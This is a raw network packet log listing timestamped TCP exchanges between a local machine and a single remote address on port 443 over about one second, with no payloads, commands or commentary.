May 4, 2024 09:48:38.597429991 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:38.597440004 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.641211033 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:38.747873068 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.747989893 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:38.748361111 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.748404026 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:38.748420000 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.748470068 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:38.749325991 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.749372005 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:38.750391960 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.750443935 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:38.750979900 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.751030922 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:38.751847982 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.751961946 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.752015114 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:38.752024889 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.752065897 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:38.752882004 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.752934933 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:38.753786087 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.753845930 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:38.754699945 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.754745960 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:38.754836082 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.754877090 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:38.755587101 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.755635977 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:38.756561041 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.756616116 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:38.757527113 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.757587910 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:38.758553982 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.758588076 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.758620024 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:38.758626938 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.758641958 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:38.804279089 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.804373026 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:38.804399014 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.804444075 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:38.907970905 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.908083916 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:38.908427954 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.908467054 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.908479929 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:38.908492088 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.908518076 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:38.909066916 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.909118891 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:38.909125090 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.910094023 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.910137892 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:38.910142899 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.910171032 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.910182953 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:38.910187960 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.910217047 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:38.911128044 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.911170959 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:38.911178112 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.911214113 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:38.912089109 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.912149906 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:38.912862062 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.912911892 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:38.913822889 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.913878918 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:38.914671898 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.914710045 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.914720058 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:38.914724112 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.914748907 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:38.915782928 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.915832043 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:38.915837049 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.915872097 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:38.916717052 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.916745901 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.916774988 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:38.916781902 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.916796923 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:38.916819096 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:38.917625904 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.917676926 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:38.918567896 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.918623924 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:38.919388056 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.919452906 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:38.920321941 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.920350075 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.920372009 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:38.920382977 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.920394897 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:38.921430111 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.921498060 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:38.921504021 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.921540976 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:38.924310923 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.924319029 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.924355030 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.924379110 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:38.924387932 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.924418926 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:38.924439907 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:38.926883936 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.926918030 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.926954031 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:38.926961899 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.926981926 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:38.929565907 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.929582119 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.929621935 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:38.929630995 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.929677963 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:38.932394981 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.932413101 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.932480097 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:38.932488918 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.934812069 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.934827089 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.934904099 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:38.934911013 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.938405037 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.938421965 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.938456059 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:38.938471079 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.938500881 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:38.941092968 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.941107035 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.941175938 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:38.941184044 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.943818092 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.943836927 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.943873882 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:38.943881989 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.943914890 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:38.965611935 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.965642929 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.965679884 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:38.965688944 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:38.965715885 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.016216040 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.071475983 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.071491957 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.071521997 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.071557999 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.071564913 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.071589947 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.071599007 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.071615934 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.071623087 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.071631908 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.071650028 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.071695089 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.073960066 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.073977947 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.074032068 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.074035883 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.074064970 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.074084997 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.077014923 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.077029943 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.077100992 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.077105999 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.077147007 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.079767942 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.079782009 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.079822063 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.079826117 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.079866886 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.082458019 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.082470894 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.082540989 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.082545996 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.082582951 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.085192919 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.085207939 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.085268021 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.085273027 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.085316896 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.088516951 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.088531971 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.088587999 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.088598013 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.088622093 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.088640928 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.091211081 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.091226101 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.091276884 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.091283083 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.091317892 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.093964100 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.093980074 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.094036102 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.094041109 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.094078064 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.096661091 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.096678019 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.096729994 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.096735001 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.096776962 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.100267887 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.100289106 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.100323915 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.100330114 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.100359917 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.100373030 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.102755070 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.102768898 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.102829933 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.102835894 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.102870941 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.105470896 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.105488062 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.105539083 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.105544090 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.105598927 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.110308886 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.110325098 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.110368013 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.110372066 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.110399961 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.110413074 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.112643957 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.112658024 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.112710953 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.112715960 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.112754107 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.115153074 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.115168095 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.115221977 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.115226984 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.115272999 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.117960930 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.117974997 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.118030071 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.118035078 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.118087053 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.121457100 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.121471882 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.121532917 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.121536970 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.121566057 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.121577978 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.124228001 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.124245882 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.124300003 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.124305010 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.124342918 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.126925945 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.126939058 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.126998901 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.127005100 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.127036095 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.129421949 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.129439116 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.129492998 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.129499912 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.129534006 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.132941008 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.132956982 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.133019924 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.133025885 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.133059978 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.135046959 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.135061026 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.135133028 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.135138035 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.135175943 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.137538910 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.137552023 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.137643099 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.137649059 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.137686968 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.140902996 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.140917063 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.140974045 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.140980005 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.141016960 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.143556118 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.143569946 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.143625021 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.143630028 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.143651962 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.143667936 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.146337986 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.146353006 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.146413088 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.146418095 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.146466970 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.232300043 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.232326984 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.232367992 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.232382059 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.232394934 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.232415915 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.232446909 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.232451916 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.232464075 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.232503891 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.236263037 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.236287117 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.236350060 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.236361980 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.236397028 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.237137079 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.237158060 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.237191916 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.237195015 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.237221003 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.237236977 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.239885092 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.239902973 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.239943981 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.239948034 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.239972115 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.239986897 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.243424892 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.243451118 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.243479013 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.243484020 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.243520021 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.246150017 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.246176958 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.246208906 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.246212959 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.246238947 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.246254921 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.248858929 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.248881102 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.248922110 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.248933077 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.248960018 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.248975992 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.251610994 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.251632929 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.251795053 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.251818895 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.251883030 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.255006075 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.255033016 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.255069017 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.255075932 CEST	443	49707	172.67.215.45	192.168.2.6
May 4, 2024 09:48:39.255099058 CEST	49707	443	192.168.2.6	172.67.215.45
May 4, 2024 09:48:39.255125999 CEST	49707	443	192.168.2.6	172.67.215.45
